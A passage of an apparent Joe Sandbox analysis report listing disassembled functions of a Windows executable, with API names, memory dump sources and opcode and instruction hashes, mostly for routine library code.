                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: *?$.
                                                                                                                                                                                                                                                        • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                                                        • Opcode ID: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                                                                                                                                                                                                                                        • Instruction ID: e8f52669226c3ed133df4434cead80ed517470948cea3e0182c56ce0eb5f774c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5051D162B14EA581FB18DFA298004B967A4FF44BD8B646531DF1E97B85DF3ED0428340
                                                                                                                                                                                                                                                        Function 00007FF6063B5510 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: memcpy_s
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1502251526-0
                                                                                                                                                                                                                                                        • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                                                                                                                                                                        • Instruction ID: b69f1b8b166088117f6fd2475cc662657bd0f3f63eb3516e32801b67c70b66d6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2D1E472B1868687DB38CF15E18466AB7A1FB88794F24A134CB4E97B44DF3DE801CB40
                                                                                                                                                                                                                                                        Function 00007FF606383BF8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF60638FD53), ref: 00007FF606383C05
                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,00007FF60638FD53), ref: 00007FF606383C39
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,00007FF60638FD53), ref: 00007FF606383C63
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1365068426-0
                                                                                                                                                                                                                                                        • Opcode ID: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
                                                                                                                                                                                                                                                        • Instruction ID: 157e2be075c0ef9d92fe5366f5c18067d64ec3945ca468ac63de0ae7b5fbd720
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4016271B0CB4686E7188F66B88017AA3A1FB89BC0F586038EA4EC7B55DF7DD5058780
                                                                                                                                                                                                                                                        Function 00007FF6063B3130 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                        • Opcode ID: 235d398572f0be20e3fb8c6319951830835c2244ab5eef47411310ef9754f573
                                                                                                                                                                                                                                                        • Instruction ID: ac6c3d4cecb843377f5148a00ff22d1b10182f44c67d2289f01ae004154c94b3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 235d398572f0be20e3fb8c6319951830835c2244ab5eef47411310ef9754f573
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72312D22B08A9145FB249B32D8057BA6B95EB44BE4F24A335EF6C87BC5CE3DD5018340
                                                                                                                                                                                                                                                        Function 00007FF6063B9008 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 15204871-0
                                                                                                                                                                                                                                                        • Opcode ID: d4849b446cfebff07557885922af6d4c071b7d011b782ff7bb17459a6eb955de
                                                                                                                                                                                                                                                        • Instruction ID: c1051dab70678e4f82a6371769c61bff3b00aec02d746b709aa9a75648260cea
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4849b446cfebff07557885922af6d4c071b7d011b782ff7bb17459a6eb955de
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DB15F73A14B898BEB19CF29C88536C3BA0F785B48F299921DB5D877A4CF3AD451C740
                                                                                                                                                                                                                                                        Function 00007FF60639CA30 Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1061551593-0
                                                                                                                                                                                                                                                        • Opcode ID: a39c6f5289eeb3ccdb5d0bd3d1d8e799027f00d468a18c17e9e0985c25432a47
                                                                                                                                                                                                                                                        • Instruction ID: 6f999567074d7919f205aac337681980f99c2505eb3b639dcdc6e2aea46133a3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a39c6f5289eeb3ccdb5d0bd3d1d8e799027f00d468a18c17e9e0985c25432a47
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF810E36B18A458AEB14CF6AD4806AD7771FB88B88F206136DE0E97764DF3DD505C780
                                                                                                                                                                                                                                                        Function 00007FF60639DE44 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2169056816-0
                                                                                                                                                                                                                                                        • Opcode ID: 8ec788ba47fdf6df10e78e7ac2cd74069c16868f0c385ff3f057b0f2eb63ee47
                                                                                                                                                                                                                                                        • Instruction ID: 81de82ac26dcb933d8f748d6fb385276ab18eb4046a70b2c2371c65c6c6bfbd9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ec788ba47fdf6df10e78e7ac2cd74069c16868f0c385ff3f057b0f2eb63ee47
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31118172A18B8595E7258F21E8403E9B360FF88B54F946135EA8D83768DF3CE645CB84
                                                                                                                                                                                                                                                        Function 00007FF606386768 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Version
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                                                                                                                                        • Opcode ID: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
                                                                                                                                                                                                                                                        • Instruction ID: 3c65cbb693eac262b5cdc0ca71f362359194ab100685b3c0b6f6d736ef114f0c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E010C759086428BE6289B14F85137673E1FB98754F602234F65EC67A4DF7EE5018F80
                                                                                                                                                                                                                                                        Function 00007FF6063AC074 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                        • API String ID: 3215553584-4108050209
                                                                                                                                                                                                                                                        • Opcode ID: 9d335eb4e928305fcc536e7a574871e99efd96511b41f203bfcc60166aca6fdf
                                                                                                                                                                                                                                                        • Instruction ID: 858a7b10fabd11652c246b63632e8734b097fca378d117598829c539e7f28fb7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d335eb4e928305fcc536e7a574871e99efd96511b41f203bfcc60166aca6fdf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2181CF32B1824646EEBC8A25948067E63A0EF45B44F743931ED4AD7695CF2FE846E7C0
                                                                                                                                                                                                                                                        Function 00007FF6063ABDF8 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                        • API String ID: 3215553584-4108050209
                                                                                                                                                                                                                                                        • Opcode ID: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                                                                                                                                                                                                                        • Instruction ID: 8fba902c5826c4b9e7f94ab36979414638e74a2eabe35c4b84e8018bab8cbaab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2071E535A0C24246FF6C8A29504467DA7D0AF41744F383539DE0AD76DACF2FE846ABC1
                                                                                                                                                                                                                                                        Function 00007FF6063AFD18 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                                                                                                                                        • Opcode ID: 75bc8b6b70552213c492e2b4d537d895552732abb840669c88296365ff73b3bd
                                                                                                                                                                                                                                                        • Instruction ID: 6c42760447328eded6fa2915b8ceacc8aa1b76288a70958723b7bbe8f9fa3a98
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75bc8b6b70552213c492e2b4d537d895552732abb840669c88296365ff73b3bd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D41C232714E5486EE48DF2AD4542A9B3A1AB58FD4B5DB036EE0DC7755DE3DD042C340
                                                                                                                                                                                                                                                        Function 00007FF6063B41B0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                                        • Opcode ID: be7ed4402fc1a38c1953c688923f2ad906cda00ccdf3b5d5fa14c8939cdf2fd3
                                                                                                                                                                                                                                                        • Instruction ID: 86e42274cc8a3459ed8e4af62a460fe84f528ebeac84102a9b537bac1492b099
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be7ed4402fc1a38c1953c688923f2ad906cda00ccdf3b5d5fa14c8939cdf2fd3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0B09224E07A06CAEA0E2B116C8221862A87F48700FA4A038C10E81360EE2D24A68B50
                                                                                                                                                                                                                                                        Function 00007FF60638BF0C Relevance: .6, Instructions: 587COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: cd28e31d7d5d8dacbc8c1e36a10d9298773be20ef7319678f464fee92af96a22
                                                                                                                                                                                                                                                        • Instruction ID: 9cd11c45e9e6f437e40e44e7fa6ad70da74bfe141e54cc5860b9d76a5fd5aafc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd28e31d7d5d8dacbc8c1e36a10d9298773be20ef7319678f464fee92af96a22
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB2204B3B206508BD728CF25C89AE5E3766F798744B4B9228DF0ACB785DB39D505CB40
                                                                                                                                                                                                                                                        Function 00007FF60638B318 Relevance: .3, Instructions: 260COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c6c4f15c2075db455a8805df7f1b959bd99bc7369c78054583d6a965d91bd105
                                                                                                                                                                                                                                                        • Instruction ID: 0a6f3e276815bf45e871cf9a7ed47fac66261108587d94cece53a8cfb271d709
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6c4f15c2075db455a8805df7f1b959bd99bc7369c78054583d6a965d91bd105
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27D1AC72A182D14EE312CB79A4144FEBFB5E71D34DB898261DFD69370AC52EE102DB60
                                                                                                                                                                                                                                                        Function 00007FF60638B948 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
